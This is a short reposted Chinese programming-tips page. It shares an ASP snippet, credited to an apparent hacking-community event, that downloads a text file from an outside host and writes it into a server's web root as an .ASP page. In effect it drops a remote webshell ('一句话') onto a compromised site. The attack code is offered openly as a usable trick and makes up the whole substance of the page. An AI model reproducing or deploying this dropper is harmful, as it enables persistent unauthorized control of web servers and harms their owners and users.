您现在的位置是:网站首页> 编程资料编程资料

asp xmlhttp下载一句话_应用技巧_

2023-05-25 340人已围观

简介 asp xmlhttp下载一句话_应用技巧_

分享一下
在3est活动中学习的godlong的
复制代码 代码如下:

<%
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.fxxxx.com/1.txt",0 '下载文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "E:\WWWROOT\fuck1.ASP",2
%>

-六神源码网